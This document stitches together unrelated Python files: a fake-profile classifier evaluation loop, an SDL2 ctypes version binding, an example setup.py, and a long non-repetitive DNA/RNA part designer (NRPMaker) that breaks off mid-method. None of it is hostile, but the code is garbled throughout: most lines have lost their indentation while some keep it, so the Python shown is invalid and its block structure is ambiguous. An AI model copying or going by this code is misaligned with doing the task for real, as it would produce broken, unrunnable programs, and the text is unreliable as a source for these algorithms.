genuine_ix, fake_ix = gen_fake()
test_genuine_count = 0
y_test = []
test_fake_count = 0
genuine_count = 0
y_pred = []
fake_count = 0
for i, (px, fl) in enumerate(ds.items()):
# print('Working on profile px = {}'.format(px))
        fl_instances, n_g, n_f = friend_pattern(ds[px], genuine_ix)
test_genuine_count += len(n_g)
test_fake_count += len(n_f)
y_test.extend(n_g)
y_test.extend(n_f)
        for px_i, ix in enumerate(fl_instances):
if fb_ipr.check_profile(ix):
genuine_count += 1
y_pred.append('genuine')
else:
fake_count += 1
y_pred.append('fake')
if i == 50:
break
print('Number of test genuine profiles: {}'.format(test_genuine_count))
print('Number of predicted genuine profiles: {}'.format(genuine_count))
print('Number of test fake profiles: {}'.format(test_fake_count))
print('Number of predicted fake profiles: {}'.format(fake_count))
print('done.')
|
from ctypes import Structure, POINTER, c_char_p, c_int
from .dll import _bind
from .stdinc import Uint8
__all__ = ["SDL_version", "SDL_MAJOR_VERSION", "SDL_MINOR_VERSION",
"SDL_PATCHLEVEL", "SDL_VERSION", "SDL_VERSIONNUM",
"SDL_COMPILEDVERSION", "SDL_VERSION_ATLEAST", "SDL_GetVersion",
"SDL_GetRevision", "SDL_GetRevisionNumber"
]
class SDL_version(Structure):
_fields_ = [("major", Uint8),
("minor", Uint8),
("patch", Uint8),
]
SDL_MAJOR_VERSION = 2
SDL_MINOR_VERSION = 0
SDL_PATCHLEVEL = 5
def SDL_VERSION(x):
x.major = SDL_MAJOR_VERSION
x.minor = SDL_MINOR_VERSION
x.patch = SDL_PATCHLEVEL
SDL_VERSIONNUM = lambda x, y, z: (x * 1000 + y * 100 + z)
SDL_COMPILEDVERSION = SDL_VERSIONNUM(SDL_MAJOR_VERSION, SDL_MINOR_VERSION, SDL_PATCHLEVEL)
SDL_VERSION_ATLEAST = lambda x, y, z: (SDL_COMPILEDVERSION >= SDL_VERSIONNUM(x, y, z))
SDL_GetVersion = _bind("SDL_GetVersion", [POINTER(SDL_version)])
SDL_GetRevision = _bind("SDL_GetRevision", None, c_char_p)
SDL_GetRevisionNumber = _bind("SDL_GetRevisionNumber", None, c_int)
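# Usage sketch (run from a package context, e.g. `python -m <pkg>.version`,
# since this module uses relative imports; assumes the SDL2 runtime is
# installed and the symbols above resolved through _bind):
if __name__ == "__main__":
    v = SDL_version()
    SDL_GetVersion(v)
    print("Linked SDL version: %d.%d.%d" % (v.major, v.minor, v.patch))
    print("Compiled against at least 2.0.5?", SDL_VERSION_ATLEAST(2, 0, 5))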
|
# https://packaging.python.org/tutorials/packaging-projects/
import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="example-pkg-YOUR-USERNAME-HERE", # Replace with your own username
version="0.0.1",
author="Example Author",
author_email="author@example.com",
description="A small example package",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/pypa/sampleproject",
packages=setuptools.find_packages(),
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
python_requires='>=3.6',
)
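# Common build commands for a setup.py-based project like this one (run from
# the project root; not part of this file):
#   python3 setup.py sdist bdist_wheel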
|
from collections import namedtuple
from itertools import count
from glob import glob
from time import time, sleep
from .synthesis import Synthesis
from .utils import Fold
from .kmerSetDB import kmerSetDB
from .kmerSetArray import kmerSetArray
import sys
import numpy
import uuid
import math
import textwrap
from . import utils
from . import makerchecks
from . import projector
from . import berno
from . import finder
from Bio.SeqUtils import MeltingTemp
class NRPMaker(object):
def __init__(self, part_type='RNA', seed=None):
# Instance variables
self.part_type = part_type
self.synthesis = Synthesis()
self.fold = Fold(part_type=part_type)
self.proj_id = str(uuid.uuid4())
self.kmer_db = None
self.background = None
# Seed the RNG
if not seed is None and isinstance(seed, int):
self.rng = numpy.random.default_rng(seed=seed)
else:
self.rng = numpy.random.default_rng()
# Lookup tables
if self.part_type == 'RNA':
self.iupac_space = {
'A': {'A'},
'C': {'C'},
'G': {'G'},
'U': {'U'},
'R': {'A', 'G'},
'Y': {'C', 'U'},
'S': {'G', 'C'},
'W': {'A', 'U'},
'K': {'G', 'U'},
'M': {'A', 'C'},
'B': {'C', 'G', 'U'},
'V': {'A', 'C', 'G'},
'D': {'A', 'G', 'U'},
'H': {'A', 'C', 'U'},
'N': {'A', 'U', 'G', 'C'}
}
self.iupac_compl = {
'A': 'U', # A - U
'C': 'G', # C - G
'G': 'Y', # G - C U - Y
'U': 'R', # U - A G - R
'R': 'Y', # R - A G - U C - Y
'Y': 'R', # Y - C U - G A G - R
'S': 'B', # S - G C - C G U - B
'W': 'D', # W - A U - U A G - D
'K': 'N', # K - G U - C U G A
'M': 'K', # M - A C - U G - K
'B': 'N', # B - C G U - G C U A - N
'V': 'D', # V - A C G - U G A - D
'D': 'N', # D - A G U - U C A G - N
'H': 'N', # H - A C U - U G A G - N
'N': 'N'
}
self.base_compl = {
'A': ['U'],
'G': ['C', 'U'],
'C': ['G'],
'U': ['A', 'G']
}
else:
self.iupac_space = {
'A': {'A'},
'C': {'C'},
'G': {'G'},
'T': {'T'},
'R': {'A', 'G'},
'Y': {'C', 'T'},
'S': {'G', 'C'},
'W': {'A', 'T'},
'K': {'G', 'T'},
'M': {'A', 'C'},
'B': {'C', 'G', 'T'},
'V': {'A', 'C', 'G'},
'D': {'A', 'G', 'T'},
'H': {'A', 'C', 'T'},
'N': {'A', 'T', 'G', 'C'}
}
self.iupac_compl = {
'A': 'T', # A - T
'C': 'G', # C - G
'G': 'C', # G - C
'T': 'A', # T - A
'R': 'Y', # R - A G - T C - Y
'Y': 'R', # Y - C T - G A - R
'S': 'S', # S - G C - C G - S
'W': 'W', # W - A T - T A - W
'K': 'M', # K - G T - C A - M
'M': 'K', # M - A C - T G - K
'B': 'V', # B - C G T - G C A - V
'V': 'B', # V - A C G - T G C - B
'D': 'H', # D - A G T - T C A - H
'H': 'D', # H - A C T - T G A - D
'N': 'N'
}
self.base_compl = {
'A': ['T'],
'G': ['C'],
'C': ['G'],
'T': ['A']
}
def _get_adjusted_struct(self, struct, seq):
if struct is None:
return '.'*len(seq)
elif len(seq) < len(struct):
return struct[:len(seq)]
elif len(seq) > len(struct):
return ''.join([struct, '.'*(len(seq) - len(struct))])
return struct
def _get_meta_struct(self, struct):
struct_spec = namedtuple(
'struct_spec', 'struct paired_dict rev_paired_dict unpaired_set folding inversefolding')
pairing_stack = []
meta_struct = struct_spec(
struct=struct.replace('x', '.'),
paired_dict={},
rev_paired_dict={},
unpaired_set=set(),
folding={},
inversefolding={})
for index, nt in enumerate(struct):
if nt == '(':
pairing_stack.append(index)
elif nt == ')':
try:
closure = pairing_stack.pop()
except:
raise ValueError(
' [X] Unbalanced parentheses in structure constraint')
meta_struct.paired_dict[closure] = index
meta_struct.rev_paired_dict[index] = closure
elif nt == 'x':
meta_struct.unpaired_set.add(index)
if pairing_stack:
raise ValueError(
' [X] Unbalanced parentheses in structure constraint')
if meta_struct.paired_dict:
meta_struct.folding['status'] = True
meta_struct.inversefolding['status'] = True
elif meta_struct.unpaired_set:
meta_struct.folding['status'] = True
meta_struct.inversefolding['status'] = False
else:
meta_struct.folding['status'] = False
meta_struct.inversefolding['status'] = False
return meta_struct
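    # Illustrative example: for struct '((xx))', paired_dict is {0: 5, 1: 4},
    # rev_paired_dict is {5: 0, 4: 1}, and unpaired_set is {2, 3}.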
def _get_meta_seq(self, seq, meta_struct):
seq = list(seq)
meta_seq = [None] * len(seq)
# Normalize Meta Sequence
for i in range(len(seq)):
try:
if i in meta_struct.paired_dict:
j = meta_struct.paired_dict[i]
if len(self.iupac_space[seq[j]]) < len(self.iupac_space[seq[i]]):
seq[i] = self.iupac_compl[seq[j]]
elif len(self.iupac_space[seq[i]]) < len(self.iupac_space[seq[j]]):
seq[j] = self.iupac_compl[seq[i]]
meta_seq[i] = set(self.iupac_space[seq[i]])
except:
raise ValueError(
' [X] Invalid IUPAC code at index {} in sequence constraint'.format(i))
return tuple(meta_seq)
def _reset_candidate_kmer_set(
self,
candidate,
kmer_set,
i):
candidate[i] = '-'
kmer_set[i] = ' '
def _clear_path(
self,
candidate,
tried_set,
kmer_set,
i,
k):
j = i
while j > k:
self._reset_candidate_kmer_set(
candidate,
kmer_set,
j)
tried_set[j] = set()
# tried_set[j] = set(candidate[j])
j -= 1
else:
self._reset_candidate_kmer_set(
candidate,
kmer_set,
j)
i = j
return i
def _get_rollback_index(
self,
meta_seq,
meta_struct,
i,
homology,
candidate,
tried_set):
roll_back_index = None
# See if any position in last homology places has potential for change
j = i
while (j >= i - homology + 1) and (j >= 0):
# Case ( or . with potential for change
if not (j in meta_struct.rev_paired_dict):
if len(meta_seq[j]) > len(tried_set[j]):
roll_back_index = j
break
# Case ) for RNA Parts with potential for change
else:
l = meta_struct.rev_paired_dict[j]
pnt = meta_seq[j]
pnt = pnt.intersection(
self.base_compl[candidate[l]])
if len(tried_set[j]) < len(pnt):
roll_back_index = j
break
j -= 1
# Else go to the ( for the first ) in the last homology places
if not roll_back_index:
j = max(0, i - homology + 1)
k = None
while j <= i:
if j in meta_struct.rev_paired_dict:
k = j
break
j += 1
roll_back_index = meta_struct.rev_paired_dict[k]
return roll_back_index
def _roll_back(
self,
meta_seq,
meta_struct,
i,
homology,
candidate,
tried_set,
kmer_set,
rbi=None):
# Default Case: Explicit roll back
if not rbi is None:
# traceback to ( if corresponding ) given
if rbi in meta_struct.rev_paired_dict:
j = meta_struct.rev_paired_dict[rbi]
pnt = meta_seq[rbi]
pnt = pnt.intersection(
self.base_compl[candidate[j]])
# No potential for change
if len(pnt) == len(tried_set[i]):
rbi = j
self._clear_path(
candidate, tried_set, kmer_set, i, k=rbi)
return rbi
# Case 1: i is not paired upstream
if not i in meta_struct.rev_paired_dict:
self._reset_candidate_kmer_set(
candidate, kmer_set, i)
# Case 2: i is paired upstream
else:
roll_back_index = self._get_rollback_index(
meta_seq, meta_struct, i, homology, candidate, tried_set)
i = self._clear_path(
candidate, tried_set, kmer_set, i, k=roll_back_index)
return i
def _get_local_roll_back_index(
self,
candidate,
i,
local_model_fn,
verbose):
# Prep candidate
candidate_str = ''.join(candidate)
candidate_str = candidate_str[:i+1]
# Try to evaluate the local_model_fn on candidate_str
outcome = True
try:
outcome = local_model_fn(candidate_str)
if outcome in [True, False]:
state, index = outcome, i
else:
state, index = outcome
except Exception as e:
print(' Local Model fn. failed to evaluate partial path: {}\n'.format(
candidate_str))
raise e # No intelligence, halt everything!
# State satisfactory?
try:
assert state in [True, False]
except Exception as e:
print(' Local Model fn. failed to evaluate partial path: {}'.format(
candidate_str))
print(' Local Model fn. returned a non-boolean evaluation: {}\n'.format(
state))
raise e
# Index satisfactory?
try:
if state == False:
index = int(index)
assert 0 <= index <= i
except Exception as e:
print(' Local Model fn. failed to evaluate partial path: {}'.format(
candidate_str))
print(' Local Model fn. returned a non-integer or invalid traceback index: {}\n'.format(
index))
raise e
# No conflict found!
if state:
return None
# Conflict Found!
else:
return index
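    # Sketch of a conforming local model fn (hypothetical, not part of the
    # API): it must return True, False, or (False, traceback_index) when
    # handed a partial candidate string.
    #
    #   def no_homopolymer(partial_seq, run=6):
    #       if len(partial_seq) >= run and partial_seq[-run:] == partial_seq[-1] * run:
    #           return (False, len(partial_seq) - run)
    #       return True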
def _get_non_coding_candidate(
self,
meta_seq,
meta_struct,
homology,
local_model_fn,
verbose,
jump=False,
start_seq=None,
allow_internal_repeat=False):
# Setup the data structures
candidate = ['-'] * len(meta_seq) if not start_seq else list(start_seq)
tried_set = [set() for _ in range(len(meta_seq))]
kmer_set = kmerSetArray(size=len(meta_seq))
# Setup indexing
i = 0
roll_back_count = 0
# Main backtracking code
while -1 < i < len(meta_seq):
# Jumping out of iteration
if jump and roll_back_count == homology:
candidate = None
break
# Try to build a candidate
if candidate[i] == '-':
# Phase determination
forward = False
# Case )
if i in meta_struct.rev_paired_dict:
j = meta_struct.rev_paired_dict[i]
pnt = meta_seq[i]
pnt = pnt.intersection(
self.base_compl[candidate[j]])
if len(pnt) > len(tried_set[i]):
forward = True
# Case ( and .
else:
if len(tried_set[i]) < len(meta_seq[i]):
forward = True
# Forward phase - A nucleotide may be chosen
if forward:
# Reset roll_back_count
roll_back_count = 0
# Case ( and .
if not i in meta_struct.rev_paired_dict:
candidate[i] = self.rng.choice(
sorted(meta_seq[i]-tried_set[i]))
tried_set[i].add(candidate[i])
# Case (
if i in meta_struct.paired_dict:
j = meta_struct.paired_dict[i]
# DNA Parts
if self.part_type == 'DNA':
pnt = self.base_compl[candidate[i]][0]
candidate[j] = pnt
# RNA Parts
else:
pnt = meta_seq[j]
pnt = pnt.intersection(
self.base_compl[candidate[i]])
candidate[j] = self.rng.choice(sorted(pnt))
tried_set[j] = set(candidate[j])
# Case )
else:
j = meta_struct.rev_paired_dict[i]
# DNA Parts
if self.part_type == 'DNA':
pnt = self.base_compl[candidate[j]][0]
candidate[i] = pnt
# RNA Parts
else:
pnt = pnt - tried_set[i]
candidate[i] = self.rng.choice(sorted(pnt))
tried_set[i].add(candidate[i])
# Backward phase - Nucleotide choices exhausted, so traceback
else:
# Update roll_back_count
roll_back_count += 1
# Reset and roll back
tried_set[i] = set()
kmer_set[i] = ' '
if i > 0:
# Clear stuff at current index
self._reset_candidate_kmer_set(
candidate,
kmer_set,
i)
# Traceback to previous index
# since current index done
i = self._roll_back(
meta_seq,
meta_struct,
i-1,
homology,
candidate,
tried_set,
kmer_set) + 1
i -= 1
continue
# See if built candidate[i] is valid
# Case ( and .
elif not i in meta_struct.rev_paired_dict:
# Wrong nucleotide selected
if not candidate[i] in meta_seq[i]:
self._reset_candidate_kmer_set(
candidate=candidate,
kmer_set=kmer_set,
i=i)
tried_set[i] = set()
continue
# Case )
elif i in meta_struct.rev_paired_dict:
j = meta_struct.rev_paired_dict[i]
# Paired bases are not complementary
# or, Wrong nucleotide selected
if (not candidate[j] in self.base_compl[candidate[i]]) or \
(not candidate[i] in meta_seq[i]):
self._reset_candidate_kmer_set(
candidate=candidate,
kmer_set=kmer_set,
i=i)
tried_set[i] = set()
continue
# See if the local model function is violated
if local_model_fn:
rbi = self._get_local_roll_back_index(
candidate, i, local_model_fn, verbose)
# Model function violated, and
# a traceback location was determined
if not rbi is None:
roll_back_count = 0 if rbi < i else roll_back_count
i = self._roll_back(
meta_seq,
meta_struct,
i,
homology,
candidate,
tried_set,
kmer_set,
rbi)
continue
# Are either of these mers seen previously?
mmer_seen = False
kmer = None
# Handle equal internal and shared repeats
if i >= homology-1:
# Get the kmer/rmer
kmer = ''.join(candidate[i-homology+1:i+1])
rmer = utils.get_revcomp(kmer)
mmer = min(kmer, rmer)
# Case: kmer/rkmer is an internal
# repeat to current part
if not allow_internal_repeat:
# Direct repeat
if kmer in kmer_set:
mmer_seen = True
# Inverted repeat
elif rmer in kmer_set:
mmer_seen = True
# Palindrome repeat
elif kmer == rmer:
mmer_seen = True
# Case: mmer is a shared repeat with
# a previous part
if not mmer_seen:
if mmer in self.kmer_db:
mmer_seen = True
# Case: mmer is a shared repeat with
# background
if not mmer_seen:
if not self.background is None:
if self.background.K == homology:
if mmer in self.background:
mmer_seen = True
# Handle background repeats
if not mmer_seen and \
not self.background is None and \
homology != self.background.K:
# Determine background K
K = self.background.K
# Check is warranted
if i >= K-1:
# Get the kmer/rmer
kmer = ''.join(candidate[i-K+1:i+1])
rmer = utils.get_revcomp(kmer)
mmer = min(kmer, rmer)
# Actual check
if mmer in self.background:
mmer_seen = True
# Traceback to eliminate repeat
if mmer_seen:
i = self._roll_back(
meta_seq,
meta_struct,
i,
homology,
candidate,
tried_set,
kmer_set)
continue
# Everything OK .. insert kmer
if i >= homology-1:
kmer_set[i] = kmer
# Roll forward
i += 1
# Prepare to return candidate
del kmer_set
if candidate is None or '-' in candidate:
return None
else:
return ''.join(candidate)
def _get_opt_pass_count(self, meta_struct, synth_opt, global_model_fn):
opt_criteria_count = 1 # Since candidate must at least be non-repetitive
if meta_struct.folding['status']:
opt_criteria_count += 1
if synth_opt:
opt_criteria_count += 1
if global_model_fn:
opt_criteria_count += 1
return opt_criteria_count
# Diagnostic function -- Shouldn't trigger on experimental changes
def _is_non_coding_construction_verified(self, meta_seq, meta_struct, candidate):
i = 0
while i < len(candidate):
if not candidate[i] in meta_seq[i]:
return False,1,i
if i in meta_struct.paired_dict:
j = meta_struct.paired_dict[i]
if not candidate[j] in self.base_compl[candidate[i]]:
return False,2,i
i += 1
return True,0,0
def _is_synthesis_verified(self, candidate):
return self.synthesis.evaluate(candidate)
def _is_structure_verified(self, meta_struct, struct_type, candidate):
struct_satisfied = 0
# Decide which structure criteria to fulfill
if struct_type == 'centroid':
candidate_structs = [self.fold.evaluate_centroid(
candidate)]
elif struct_type == 'both':
candidate_structs = [self.fold.evaluate_mfe(
candidate)]
candidate_structs.append(self.fold.evaluate_centroid(
candidate))
else:
candidate_structs = [self.fold.evaluate_mfe(
candidate)]
for candidate_struct in candidate_structs:
vienna_meta_struct = self._get_meta_struct(
candidate_struct)
# Ensure all forbidden base indices unpaired
for bp_closed in meta_struct.unpaired_set:
if not vienna_meta_struct.struct[bp_closed] == '.':
return False
# Ensure all paired base indices paired as desired
for bp_open in meta_struct.paired_dict:
if not bp_open in vienna_meta_struct.paired_dict:
break
else:
if meta_struct.paired_dict[bp_open] != vienna_meta_struct.paired_dict[bp_open]:
break
else:
struct_satisfied += 1
# All structure criteria satisfied
if struct_satisfied == len(candidate_structs):
return True
else:
return False
def _get_inverse_fold_candidate(self, start_seq, meta_seq, meta_struct):
inverse_fold_seq = ''.join(char.lower() if len(meta_seq[i]) == 1 else char for i,char in enumerate(start_seq))
return self.fold.design(
seq=inverse_fold_seq, struct=meta_struct.struct).upper()
def _get_verified_non_coding_candidate(self,
homology,
meta_seq,
meta_struct,
struct_type,
synth_opt,
local_model_fn,
global_model_fn,
jump_count,
fail_count,
verbose,
abortion,
allow_internal_repeat=False):
# Setup counts and variables
current_jump_count = 0
current_fail_count = 0
struct_fail_count = 0
synth_fail_count = 0
model_fail_count = 0
seed_seq = None
verified_candidate = None
opt_pass_count = self._get_opt_pass_count(
meta_struct,
synth_opt,
global_model_fn)
while not verified_candidate:
# Try to get a non-repetitive candidate
start_seq = self._get_non_coding_candidate(
meta_seq=meta_seq,
meta_struct=meta_struct,
homology=homology,
local_model_fn=local_model_fn,
verbose=verbose,
jump=current_jump_count < jump_count,
start_seq=seed_seq,
allow_internal_repeat=allow_internal_repeat)
candidate = start_seq
if start_seq:
# If structure unmatched but constraint has base pairings, go for inverse-repair strategy
if meta_struct.inversefolding['status'] and not self._is_structure_verified(
meta_struct, struct_type, start_seq):
inverse_fold_seq = self._get_inverse_fold_candidate(
start_seq,
meta_seq,
meta_struct)
candidate = self._get_non_coding_candidate(
meta_seq=meta_seq,
meta_struct=meta_struct,
homology=homology,
local_model_fn=local_model_fn,
verbose=verbose,
jump=current_jump_count < jump_count,
start_seq=inverse_fold_seq,
allow_internal_repeat=allow_internal_repeat)
opt_count = 0
# If valid candidate then process
if candidate:
current_jump_count = 0
opt_count += 1
# Diagnostic block -- Shouldn't trigger on experimental changes
construction = self._is_non_coding_construction_verified(
meta_seq,
meta_struct,
candidate)
construction_state = construction[0]
error_digest = construction[1:]
if not construction_state:
current_fail_count += 1
raise Exception(
'Maker built a rogue candidate: {}\nError Digest: {}\nPlease report issue to authors.'.format(
candidate,
error_digest))
else:
pass
# Synthesis optimization
if synth_opt:
if self._is_synthesis_verified(candidate):
opt_count += 1
else:
synth_fail_count += 1
# Global model optimization
if global_model_fn:
# Try to evaluate the global_model_fn on candidate_str
outcome = True
try:
outcome = global_model_fn(candidate)
except Exception as e:
print(' Global Model fn. failed to evaluate complete path: {}\n'.format(
candidate))
raise e
# Outcome satisfactory?
try:
assert outcome in [True, False]
except Exception as e:
print(' Global Model fn. returned a non-boolean state: {}\n'.format(
outcome))
raise e
# Process outcome
if outcome: # True
opt_count += 1
else: # False
model_fail_count += 1
# Structural optimization
if meta_struct.folding['status']:
if self._is_structure_verified(
meta_struct,
struct_type,
candidate):
opt_count += 1
else:
struct_fail_count += 1
# Did everything get optimized?
if opt_count == opt_pass_count:
verified_candidate = candidate
else:
current_fail_count += 1
# Failure count exceeded, terminate
if current_fail_count == fail_count:
break
# No candidate produced
else:
# No jumps made yet no non-repetitive candidate found
if current_jump_count >= jump_count:
break
# Increase current_jump_count
else:
current_jump_count += 1
# Abortion limit reached?
if abortion and current_jump_count >= jump_count:
break
if int(verbose) > 1:
print('\n [seq fails] {}, [struct fails] {}, [synth fails] {}, [global fails] {}, [opt fails] {}'.format(
current_jump_count,
struct_fail_count,
synth_fail_count,
model_fail_count,
current_fail_count))
return verified_candidate, current_jump_count+1, current_fail_count+1
def _get_non_coding_nrps(
self,
homology,
seq,
struct,
struct_type,
target,
synth_opt,
local_model_fn,
global_model_fn,
jump_count,
fail_count,
verbose,
abortion,
allow_internal_repeat=False):
# Setup structures
seq = seq.upper()
meta_struct = self._get_meta_struct(
struct=self._get_adjusted_struct(struct, seq))
meta_seq = self._get_meta_seq(
seq=seq,
meta_struct=meta_struct)
seq_count = 0
iter_count = 0
time_sum = 0.0
begin_time = time()
break_flag = False
# Setup Bernoulli Success model
total_jump_trials = jump_count
total_jump_successes = 1
curr_jump_prob = berno.get_prob(
trials=total_jump_trials,
success=total_jump_successes)
curr_jump_trial = jump_count
total_fail_trials = fail_count
total_fail_successes = 1
curr_fail_prob = berno.get_prob(
trials=total_fail_trials,
success=total_fail_successes)
curr_fail_trial = fail_count
# Stream parts until completion
while True:
t0 = time()
candidate, curr_jump_trial, curr_fail_trial = self._get_verified_non_coding_candidate(
homology,
meta_seq,
meta_struct,
struct_type,
synth_opt,
local_model_fn,
global_model_fn,
curr_jump_trial,
curr_fail_trial,
verbose,
abortion,
allow_internal_repeat)
if candidate is None:
break_flag = True
            # Got a candidate -- record its k-mers and yield it
if not break_flag:
final_candidate = candidate
update_status = True
try:
for kmer in utils.stream_min_kmers(
seq=candidate,
k=homology):
self.kmer_db.add(kmer)
except Exception as E:
update_status = False
if not update_status: # Memory full
if verbose:
print('[ERROR] Memory Full ... Breaking Loop')
yield update_status
seq_count += 1
time_sum += time()-t0
iter_count += 1
if verbose:
print(' [part] {}, [{}-mers] {}, [iter time] {:.2f}s, [avg time] {:.2f}s, [total time] {:.2f}h'.format(
seq_count,
homology,
len(self.kmer_db),
time()-t0, time_sum / iter_count,
(time() - begin_time) / 3600.0))
yield final_candidate
# No more parts required
if seq_count == target:
break
# No more candidates to build
else:
yield candidate
break
# Update failure limits based on Bernoulli Success model
total_jump_trials += curr_jump_trial
total_jump_successes += 1
curr_jump_prob = berno.get_prob(trials=total_jump_trials, success=total_jump_successes)
curr_jump_trial = berno.get_trials(prob=curr_jump_prob)
total_fail_trials += curr_fail_trial
total_fail_successes += 1
curr_fail_prob = berno.get_prob(trials=total_fail_trials, success=total_fail_successes)
curr_fail_trial = berno.get_trials(prob=curr_fail_prob)
def _check_maker_constraints(
self,
seq,
struct,
part_type,
allow_internal_repeat,
target,
homology):
# Sequence Legality 1
if not isinstance(seq, str):
print('\n [ERROR] Sequence Constraint must be a string, not {}'.format(type(seq)))
print(' [SOLUTION] Try correcting Sequence Constraint\n')
return False
# Sequence Legality 2
if len(seq) < 5:
print('\n [ERROR] Sequence Constraint must be longer than 4 bases, not {}'.format(len(seq)))
print(' [SOLUTION] Try using a longer Sequence Constraint\n')
return False
# Structure Legality 1
if not isinstance(struct, str):
print('\n [ERROR] Structure Constraint must be a string, not {}'.format(type(struct)))
print(' [SOLUTION] Try correcting Structure Constraint\n')
return False
# Structure Legality 2
if len(struct) != len(seq):
print('\n [ERROR] Structure Constraint must be same length as Sequence Constraint ({}), not {}'.format(
len(seq),
len(struct)))
print(' [SOLUTION] Try correcting length of Structure Constraint\n')
return False
# Part Type Legality 1
if not isinstance(part_type, str):
print('\n [ERROR] Part Type must be a string, not \'{}\''.format(type(part_type)))
print(' [SOLUTION] Try correcting Part Type\n')
return False
# Part Type Legality 2
if not part_type in ['DNA', 'RNA']:
print('\n [ERROR] Part Type must be \'RNA\' or \'DNA\', not \'{}\''.format(part_type))
print(' [SOLUTION] Try correcting Part Type\n')
return False
# Sequence Legality 3
seq_legal, seq_illegal_chars = makerchecks.is_seq_constr_legal(seq, part_type)
if not seq_legal:
print('\n [ERROR] {} Sequence Constraint is not legal due to chars: {}'.format(part_type, seq_illegal_chars))
print(' [SOLUTION] Try correcting Sequence Constraint or Part Type\n')
return False
# Structure Legality 3
struct_legal, unclosed, unopened, invalid = makerchecks.is_structure_valid(struct)
if not struct_legal:
print('\n [ERROR] Structure Constraint is illegal or unbalanced')
if unclosed:
print(' [ERROR] >> Unclosed bases at locations: {}'.format(unclosed))
if unopened:
print(' [ERROR] >> Unopened bases at locations: {}'.format(unopened))
if invalid:
print(' [ERROR] >> Invalid characters at locations: {}'.format(invalid))
print(' [SOLUTION] Try correcting Structure Constraint\n')
return False
# Sequence + Structure + Part Type Base Pairing Combination Legality
combo_state, incompat_locs, reduced_locs = makerchecks.is_pairing_compatible(seq, struct, part_type)
if not combo_state:
if incompat_locs:
print('\n [ERROR] Incompatible Base Pairing for {} Parts at locations: {}'.format(part_type, incompat_locs))
print(' [SOLUTION] Try correcting Sequence Constraint or Part Type\n')
return False
if reduced_locs: # -- soft check
print('\n [WARNING] Reducible Paired Bases at locations: {}'.format(reduced_locs))
print(' [WARNING] Fewer Parts may be Generated')
# Lmax Legality 1
if not isinstance(homology, int):
print('\n [ERROR] Lmax must be an integer, not {}'.format(type(homology)))
print(' [SOLUTION] Try correcting Lmax\n')
return False
# Lmax Legality 2
if homology-1 < 5:
print('\n [ERROR] Lmax must be greater than 4, not {}'.format(homology-1))
print(' [SOLUTION] Try correcting Lmax\n')
return False
# Lmax Legality 3
if homology-1 >= len(seq):
print('\n [ERROR] Lmax must be less than length of Sequence Constraint ({}), not {}'.format(len(seq), homology-1))
print(' [SOLUTION] Try correcting Lmax\n')
return False
# Target Size Legality 1
if not isinstance(target, int):
print('\n [ERROR] Target Size must be an integer, not {}'.format(type(target)))
print(' [SOLUTION] Try correcting Target Size\n')
return False
# Target Size Legality 2
if target < 1:
print('\n [ERROR] Target Size must be greater than 0, not {}'.format(target))
print(' [SOLUTION] Try correcting Target Size\n')
return False
# Sequence Sufficiency -- soft check
seq_sufficient, constrained_motif_locs = makerchecks.is_seq_constr_sufficient(seq, struct, homology, target)
if not seq_sufficient:
print('\n [WARNING] Target Size of {} may be unreachable from given Sequence/Structure Constraint and Lmax of {}'.format(target, homology-1))
print(' [WARNING] >> Lmax limiting windows between locations: {}'.format(constrained_motif_locs))
print(' [WARNING] Fewer Parts may be Generated')
# Internal Repeats Legality
if not allow_internal_repeat in [True, False]:
print('\n [ERROR] Internal Repeat must be boolean, not {}'.format(type(allow_internal_repeat)))
print(' [SOLUTION] Try correcting Internal Repeat\n')
return False
# Structure Sufficiency
if not allow_internal_repeat:
struct_sufficient, long_hairpins = makerchecks.is_structure_not_conflict(struct, homology)
if not struct_sufficient:
print('\n [ERROR] Structure Constraint is insufficient based on given Lmax')
for long_hairpin in long_hairpins:
print(' [ERROR] >> Long hairpin at locations: {}'.format(long_hairpin))
print(' [SOLUTION] Try relaxing Structure Constraint or setting internal_repeats=True')
print()
return False
return True
def _check_maker_inputs(
self,
struct_type,
synth_opt,
jump_count,
fail_count,
output_file,
verbose):
# Struct Type Legality
if not struct_type in ['mfe', 'centroid', 'both']:
print('\n [ERROR] Struct Type must be \'mfe\', \'centroid\' or \'both\', not \'{}\''.format(struct_type))
print(' [SOLUTION] Try correcting Part Type\n')
return False
# Synth Optimization Legality
if not synth_opt in [True, False]:
print('\n [ERROR] Synth Opt must be True or False, not {}'.format(synth_opt))
print(' [SOLUTION] Try correcting Synth Opt\n')
return False
# Jump Count Legality 1
if not isinstance(jump_count, int):
print('\n [ERROR] Jump Count must be an integer, not {}'.format(type(jump_count)))
print(' [SOLUTION] Try correcting Jump Count\n')
return False
# Jump Count Legality 2
if jump_count < 0:
print('\n [ERROR] Jump Count must be greater than 0, not {}'.format(jump_count))
print(' [SOLUTION] Try correcting Jump Count\n')
return False
# Fail Count Legality 1
if not isinstance(fail_count, int):
print('\n [ERROR] Fail Count must be an integer, not {}'.format(type(fail_count)))
print(' [SOLUTION] Try correcting Fail Count\n')
return False
# Fail Count Legality 2
if fail_count < 0:
print('\n [ERROR] Fail Count must be greater than 0, not {}'.format(fail_count))
print(' [SOLUTION] Try correcting Fail Count\n')
return False
# Output File Legality
if not output_file is None:
if not isinstance(output_file, str):
print('\n [ERROR] Output File must be a string or None, not {}'.format(type(output_file)))
print(' [SOLUTION] Try correcting Output File\n')
return False
# Everything OK
return True
def nrp_maker(self,
homology,
seq_constr,
struct_constr,
target_size,
background=None,
struct_type=None,
synth_opt=True,
local_model_fn=None,
global_model_fn=None,
jump_count=10,
fail_count=1000,
output_file=None,
verbose=True,
abortion=True,
allow_internal_repeat=False,
check_constraints=True):
if verbose:
print('\n[Non-Repetitive Parts Calculator - Maker Mode]')
build_parts = True
# Check Maker Constraints
if check_constraints:
if verbose:
print('\n[Checking Constraints]')
print(' Sequence Constraint: {}'.format(seq_constr))
print(' Structure Constraint: {}'.format(struct_constr))
print(' Part Type : {}'.format(self.part_type))
print(' Lmax : {} bp'.format(homology-1))
print(' Target Size : {} parts'.format(target_size))
print(' Internal Repeats : {}'.format(allow_internal_repeat))
check_status = self._check_maker_constraints(
seq_constr,
struct_constr,
self.part_type,
allow_internal_repeat,
target_size,
homology)
if check_status == False:
if verbose:
print(' Check Status: FAIL\n')
build_parts = False
else:
if verbose:
print('\n Check Status: PASS')
# Background Check
if build_parts:
if not background is None:
if verbose:
